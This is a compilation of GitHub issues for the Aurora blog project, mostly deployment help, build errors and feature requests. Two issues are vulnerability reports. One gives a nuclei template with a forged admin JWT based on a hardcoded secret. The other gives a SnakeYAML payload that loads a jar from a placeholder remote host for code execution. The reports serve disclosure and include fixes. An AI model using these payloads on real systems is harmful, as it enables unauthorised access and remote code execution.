评论有bug，用户提交评论需要校验参数

1. Steps to reproduce

Modify the sub field in jwt to be the id of another user to fake his/her identity.

The nuclei template is as follows

id: aurora-jwt-hardencoding

info:
  name: Aurora blog jwt secret key hardencoding
  author: calico
  severity: high
  description: jwt secret key hardcoding leads to unauthorised access
  reference:
    - https://github.com/linhaojun857/aurora/
  tags: unauth

requests:
  - raw:
      - |+
        GET /api/admin/users/role HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:109.0) Gecko/20100101 Firefox/113.0
        Accept: application/json, text/plain, */*
        Accept-Language: en-US,en;q=0.5
        Accept-Encoding: gzip, deflate
        Authorization: Bearer eyJhbGciOiJIUzI1NiJ9.eyJqdGkiOiJjMThlZTQxYWRmZDk0ZDYyOWQ2ZjExNTAxM2NkMjVmNiIsInN1YiI6IjEiLCJpc3MiOiJodWF3ZWltaWFuIn0.JoipYRzDC3jKAqNhV_0skiq4XikhNCmj2shMl5F1euA
        Connection: close


    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"code":20000'
      - type: status
        status:
          - 200

2. Expected behavior

The JwtAuthenticationTokenFilter gets the jwt from the request via the tokenService#getUserDetailDTO method.

Call the parseToken method to verify that the jwt is valid.

3. Actual behavior

In the parseToken method, get the signing key for jwt via the generalKey method

Since SECRET is hardcoded in the code, the same key is returned in the generalKey method, resulting in a forged jwt

4. Affected Version

latest

5. Fixes Recommendations

Randomly generate the key for jwt when the program is run

不知道这个问题发现了没 maxwell启动的时候一直启动失败 报错信息是连接数据库失败 ，经过查看官方文档maxwell启动似乎默认连接的是3306端口 而我更改了mysql的默认端口 故在作者启动命令上添加端口参数 --port=8000 整体启动命令如下 docker run --name maxwell --restart=always -d zendesk/maxwell bin/maxwell --user='root' --password='123456' --host='xxx.xxx.xxx' --port=8000 --producer=rabbitmq --rabbitmq_user='root' --rabbitmq_pass='123456' --rabbitmq_host=''xxx.xxx.xxx' --rabbitmq_port='5672' --rabbitmq_exchange='maxwell_exchange' --rabbitmq_exchange_type='fanout' --rabbitmq_exchange_durable='true' --filter='exclude: ., include: aurora.t_article.article_title = *, include: aurora.t_article.article_content = *, include: aurora.t_article.is_delete = *, include: aurora.t_article.status = *' //运行MaxWell 这样我才得已启动

能不能弄成一個 docker-compose 啊？

大佬，默认的英文和黑色主题可以改为默认中文和亮色吗？

希望增加动态标题显示

项目很棒，人很强，有时间学习下。

没有考虑mq的消息可靠性、幂等性吗？

在一台2G内存+2核心的服务器部署该项目，包括：
aurora-springboot-0.0.1.jar
maxwell
rabbit
mysql
redis6
会出现内存占用溢出导致服务器崩溃等异常

数据库给的密码是一段加密后的代码，在前台强行登陆[email protected]和123456一直显示错误，求助

这个链接一直在跑，该如何解决

可能也不是什么问题吧，浅提一嘴，没事找事嘿嘿。

纯萌新，为何后端的日志不直接在Aspect异步记录，而要发布事件通过EventListener异步记录，这里没看懂，是有什么用意吗，求解

1. Steps to reproduce

Using the project https://github.com/artsploit/yaml-payload, modify AwesomeScriptEngineFactory.java as follows

Building and package, moveyaml-payload.jar into the root directory of the web service

javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .

A new scheduled task is created as follows

调用方法 field is org.yaml.snakeyaml.Yaml.load('!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://IP:PORT/yaml-payload.jar"]]]]')

Execute this task after submission to remotely execute arbitrarily code

2. Expected behavior

The com.aurora.util.JobInvokeUtil#invokeMethod method is used to reflectively execute the specified method of the given class

3. Actual behavior

However, there is no filtering of incoming class names and method names in this method, resulting in dangerous class names and method names being passed in and executed

4. Affected Version

latest

5. Fixes Recommendations

1. Filter dangerous class names
2. Filter unnecessary protocols such as http, rmi, etc.

issues说明

• 项目在部署和使用过程中的一些常见问题作一个汇总以及解答，如果您遇到的问题在此issues中仍未得到解答，请在此issues下提出您的问题详细，或者在我们的QQ交流群中进行提问解决。
• 当然，如果你还发现并解决了项目的其他问题，非常欢迎来此贡献你的思路。
• 另外，项目在B站也有了对应的部署视频，需要的小伙伴可以去看看，配合文档食用，直接香喷喷。@沈自在 录屏不易，欢迎一键三连。
• 视频部署教程传送门

FAQ正文

​ 在阅读下面的内容之前，确保你拉取的是博主最新的代码，可以避免很多坑。

如何将博客项目部署上线？

见项目部署文档。

为什么我按照文档操作，前台成功https,后台不行？

在保证完全套用文档提供的模板之后，请检查前后台所用ssl证书是否相同，确保一个域名对应一个证书文件。

为什么开启了MaxWell和ElasticSearch却无法搜索出内容？

保证运行无异常情况下，首次使用需要手动通过后台定时任务的方式将数据库数据同步到ES中。

为什么下载的sql文件出现导入失败？

建议直接将你的MySQL版本升到8.x版本。

为什么【相册】功能无法显示?

相册默认数据为空，请自己存一些照片数据即可。

为什么我docker容器服务都正常打开了，却无法访问？

检查你的服务器防火墙和安全组规则，确保对应服务所需的端口处于放行状态，由于不同系统命令差异，请自行百度(Google)解决。

为什么我前台页面都按照文档填写了QQ登录信息，但还是出现QQ登录错误？

检查是否在后台的application.yml配置文件中的app-id: 项也配置了自己正确的app-id: 。

为什么邮件提示显示的是博主的博客名称？

自行修改后端邮件模板user.html、Owner.html以及其他代码部分涉及的内容即可。

为什么前端执行npm命令总是报错？

检查自己的npm、vue以及node等版本信息，具体参考部署文档提供的版本号。

为什么【关于】页面显示异常？

确保数据库有数据，如果你修改了默认管理员账户，记得关注以下用户id。

为什么我的QQ互联审核信息提交显示修改失败异常？

检查提交的信息是否正确，确认登录的账户是否通过了 邮箱验证。

如何更换自己的图像验证码？

百度【天御验证码】，进入官网自行按照文档提示设置，拿到自己的验证码key，替换博主的即可。

QQ互联信息中的【回调地址】怎么写？

示例格式:https://你的域名/oauth/login/qq

QQ互联信息的【提供方】怎么写？

一般指的是你域名备案的地方，比如我在阿里云进行的备案，就写阿里云。

QQ互联的【网站图标】什么意思？

随便传张图片，大小要求100x100即可。

前端项目run的时候出现类似xxx模块找不到等错误怎么办？

参考【项目部署文档】里面提供的npm、vue版本并自行调整。

如果登录过程出现如下报错，请将JDK版本换为1.8,或则添加下面的依赖进行修复。

javax/xml/bind/DatatypeConverter...

 <dependency>
            <groupId>javax.xml.bind</groupId>
            <artifactId>jaxb-api</artifactId>
            <version>2.3.0</version>
        </dependency>
        <dependency>
            <groupId>com.sun.xml.bind</groupId>
            <artifactId>jaxb-impl</artifactId>
            <version>2.3.0</version>
        </dependency>
        <dependency>
            <groupId>com.sun.xml.bind</groupId>
            <artifactId>jaxb-core</artifactId>
            <version>2.3.0</version>
        </dependency>
        <dependency>
            <groupId>javax.activation</groupId>
            <artifactId>activation</artifactId>
            <version>1.1.1</version>
        </dependency>

我nginx是这样配置
但是访问不了

希望能加一个修改的同时有编辑功能，不然头像压的很难看

read-shrinkwrap This version of npm is compatible with lockfileVersion@1, but package-lock.json was
前端编译不过，你的编译vue npm 是什么版本？

预览图可以正常显示，但是点击文章内图片的时候无法显示，发送了这个请求。

挺好看的，支持

OSS那一步就不知所措了

相册功能的图片压缩会损失挺多画质，有没有办法把传输图片的大小改大一些

有无表模型图，想了解一下每个表的关系

测试mysql 5.7.x 不能导入sql文件
没有utf8mb4_0900_ai_ci这种排序方式

博主能开发对应的微信小程序版本嘛，借鉴学习一下，谢谢！

前台点击说说，找到8月30号和8月29号的说说，点击之后出现短暂界面后，报404错误

aurora-blog项目使用npm install安装依赖报警告 运行页面报错，node版本是14.10.0
警告信息：
npm WARN deprecated @babel/[email protected]: This proposal has been merged to the ECMAScript standard and thus this plugin is no longer maintained. Please use @babe
l/plugin-transform-class-properties instead.
npm WARN deprecated [email protected]: See https://github.com/lydell/source-map-url#deprecated
npm WARN deprecated [email protected]: Modern JS already guarantees Array#sort() is a stable sort, so this library is deprecated. See the compatibility table on MDN: https://developer.mozilla.
org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Array/sort#browser_compatibility
npm WARN deprecated [email protected]: Please upgrade to consolidate v1.0.0+ as it has been modernized with several long-awaited fixes implemented. Maintenance is supported by Forward Em
ail at https://forwardemail.net ; follow/watch https://github.com/ladjs/consolidate for updates and release changelog
npm WARN deprecated [email protected]: Please see https://github.com/lydell/urix#deprecated
npm WARN deprecated [email protected]: this library is no longer supported
npm WARN deprecated [email protected]: See https://github.com/lydell/source-map-resolve#deprecated
npm WARN deprecated [email protected]: https://github.com/lydell/resolve-url#deprecated
npm WARN deprecated [email protected]: Please upgrade to version 7 or higher. Older versions may use Math.random() in certain circumstances, which is known to be problematic. See https://v8.d
ev/blog/math-random for details.
npm WARN deprecated [email protected]: request has been deprecated, see request/request#3142
页面错误信息：
Cannot read properties of undefined (reading 'avatar')
TypeError: Cannot read properties of undefined (reading 'avatar')
at Proxy.render (webpack-internal:///./node_modules/babel-loader/lib/index.js!./node_modules/ts-loader/index.js??clonedRuleSet-41.use[1]!./node_modules/vue-loader/dist/templateLoader.js??ruleSet[1].rules[4]!./node_modules/vue-loader/dist/index.js??ruleSet[0].use[0]!./src/components/ArticleCard/src/HorizontalArticle.vue?vue&type=template&id=0b1a5d7e&scoped=true&ts=true:119:30)
at renderComponentRoot (webpack-internal:///./node_modules/@vue/runtime-core/dist/runtime-core.esm-bundler.js:890:38)
at ReactiveEffect.componentUpdateFn [as fn] (webpack-internal:///./node_modules/@vue/runtime-core/dist/runtime-core.esm-bundler.js:5067:46)
at ReactiveEffect.run (webpack-internal:///./node_modules/@vue/reactivity/dist/reactivity.esm-bundler.js:216:19)
at instance.update (webpack-internal:///./node_modules/@vue/runtime-core/dist/runtime-core.esm-bundler.js:5164:51)
at setupRenderEffect (webpack-internal:///./node_modules/@vue/runtime-core/dist/runtime-core.esm-bundler.js:5172:5)
at mountComponent (webpack-internal:///./node_modules/@vue/runtime-core/dist/runtime-core.esm-bundler.js:4986:5)
at processComponent (webpack-internal:///./node_modules/@vue/runtime-core/dist/runtime-core.esm-bundler.js:4951:9)
at patch (webpack-internal:///./node_modules/@vue/runtime-core/dist/runtime-core.esm-bundler.js:4633:11)
at mountChildren (webpack-internal:///./node_modules/@vue/runtime-core/dist/runtime-core.esm-bundler.js:4790:7)

aurora-blog 依赖下载好之后，启动的时候，报错了、Google了一圈没有解决的。
ERROR in src/views/Tags.vue:18:64
TS2307: Cannot find module 'vue' or its corresponding type declarations.
16 |
17 | <script lang="ts">

18 | import { defineComponent, onMounted, onUnmounted, toRef } from 'vue'
| ^^^^^
19 | import Breadcrumb from '@/components/Breadcrumb.vue'
20 | import { useI18n } from 'vue-i18n'
21 | import { useTagStore } from '@/stores/tag'

ERROR in src/views/Talk.vue:52:81
TS2307: Cannot find module 'vue' or its corresponding type declarations.
50 |
51 | <script lang="ts">

52 | import { defineComponent, onMounted, reactive, toRefs, provide, computed } from 'vue'
| ^^^^^
53 | import { useRoute, useRouter } from 'vue-router'
54 | import { useI18n } from 'vue-i18n'
55 | import Breadcrumb from '@/components/Breadcrumb.vue'

ERROR in src/views/TalkList.vue:62:62
TS2307: Cannot find module 'vue' or its corresponding type declarations.
60 |
61 | <script lang="ts">

62 | import { defineComponent, onMounted, reactive, toRefs } from 'vue'
| ^^^^^
63 | import { useI18n } from 'vue-i18n'
64 | import Breadcrumb from '@/components/Breadcrumb.vue'
65 | import { Sidebar, Profile } from '../components/Sidebar'

我是Java开发，看了下这个博客非常好，我想为这个项目做出一点贡献也为巩固自己技术知识

如图，显示的月份是正确的月份的上个月；
且控制台报错：找不到settings.months下标为12的元素

英文版也出现相同问题。

一, 软件版本

node  v18.18.0
npm   8.3.1
@vue/cli 5.0.8

编译命令

npm install 

npm run dev

二, 错误日志

ERROR in src/views/FriendLink.vue:47:81
TS2307: Cannot find module 'vue' or its corresponding type declarations.
    45 |
    46 | <script lang="ts">
  > 47 | import { defineComponent, reactive, provide, computed, toRefs, onMounted } from 'vue'
       |                                                                                 ^^^^^
    48 | import { useI18n } from 'vue-i18n'
    49 | import { Sidebar, Profile } from '../components/Sidebar'
    50 | import Breadcrumb from '@/components/Breadcrumb.vue'

ERROR in src/views/Home.vue:72:84
TS2307: Cannot find module 'vue' or its corresponding type declarations.
    70 |
    71 | <script lang="ts">
  > 72 | import { computed, defineComponent, onMounted, ref, toRefs, toRef, reactive } from 'vue'
       |                                                                                    ^^^^^
    73 | import { Feature, FeatureList } from '@/components/Feature'
    74 | import { ArticleCard, HorizontalArticle } from '@/components/ArticleCard'
    75 | import { Title } from '@/components/Title'

ERROR in src/views/Message.vue:23:81
TS2307: Cannot find module 'vue' or its corresponding type declarations.
    21 | </template>
    22 | <script lang="ts">
  > 23 | import { defineComponent, onMounted, reactive, toRefs, computed, provide } from 'vue'
       |                                                                                 ^^^^^
    24 | import { useI18n } from 'vue-i18n'
    25 | import { Sidebar, Profile } from '../components/Sidebar'
    26 | import Breadcrumb from '@/components/Breadcrumb.vue'

ERROR in src/views/Photos.vue:44:61
TS2307: Cannot find module 'vue' or its corresponding type declarations.
    42 | </template>
    43 | <script lang="ts">
  > 44 | import { computed, defineComponent, reactive, toRefs } from 'vue'
       |                                                             ^^^^^
    45 | import { useI18n } from 'vue-i18n'
    46 | import { useCommonStore } from '@/stores/common'
    47 | import { useRoute, onBeforeRouteUpdate } from 'vue-router'

ERROR in src/views/Tags.vue:18:64
TS2307: Cannot find module 'vue' or its corresponding type declarations.
    16 |
    17 | <script lang="ts">
  > 18 | import { defineComponent, onMounted, onUnmounted, toRef } from 'vue'
       |                                                                ^^^^^
    19 | import Breadcrumb from '@/components/Breadcrumb.vue'
    20 | import { useI18n } from 'vue-i18n'
    21 | import { useTagStore } from '@/stores/tag'

ERROR in src/views/Talk.vue:52:81
TS2307: Cannot find module 'vue' or its corresponding type declarations.
    50 |
    51 | <script lang="ts">
  > 52 | import { defineComponent, onMounted, reactive, toRefs, provide, computed } from 'vue'
       |                                                                                 ^^^^^
    53 | import { useRoute, useRouter } from 'vue-router'
    54 | import { useI18n } from 'vue-i18n'
    55 | import Breadcrumb from '@/components/Breadcrumb.vue'

ERROR in src/views/TalkList.vue:62:62
TS2307: Cannot find module 'vue' or its corresponding type declarations.
    60 |
    61 | <script lang="ts">
  > 62 | import { defineComponent, onMounted, reactive, toRefs } from 'vue'
       |                                                              ^^^^^
    63 | import { useI18n } from 'vue-i18n'
    64 | import Breadcrumb from '@/components/Breadcrumb.vue'
    65 | import { Sidebar, Profile } from '../components/Sidebar'

后台管理登录/api/users/login接口是否缺失，在后端代码没有找到对应的接口

主题来源：https://github.com/auroral-ui/hexo-theme-aurora
所有样式移植过来了，至少也要写一下来源呀

可以看看 commit log，我的代码很早之前就有了。

你这感谢了 网盾星球，Jetbrains，也提一下我写的主题来源。

请问前端工程最好使用哪个版本的node，我看了部署文档，vue/cli选择5.0.6没有这个版本，今天被这这个版本问题整嘛了，来自一名还没学过前端框架的后端学习者。

请问作者大大 前端代码是手撸的嘛？如果是模板的话，冒昧请问这些模板是从哪里找的呢？

给了一段文字居中，但是发布文章后，显示有问题
同样的问题还有右对齐、角标等。

bug：

用minio做对象存储，访问路径是uri+bucketName+path，目前的逻辑把bucketName忘掉了，会访问不到

建议：

前端的访问可以从绝对路径改成相对路径，这样的话可以把前台后台配置在同一个域名下，通过不同的路径区分

如：xxx.com是前台， xxx.com/admin/是后台

前端技术栈真是我知识盲区了，尝试自己改，改了好久都没改好😂

有没有编译好的包，Centos下一键部署啊
现在部署方式有点复杂，而且没办法翻墙访问github啊

我的思源笔记发布辅助工具，想集成发布到你的博客功能，不知道你的博客有没有提供xmlrpc的API

可以看看我的兼容情况
https://github.com/terwer/src-sy-post-publisher/blob/main/src/utils/api.ts

node v16.13.1
npm v8.3.1
error Invalid Version: 0.1.0a2

我不太懂这块，请大佬指点一下怎么搞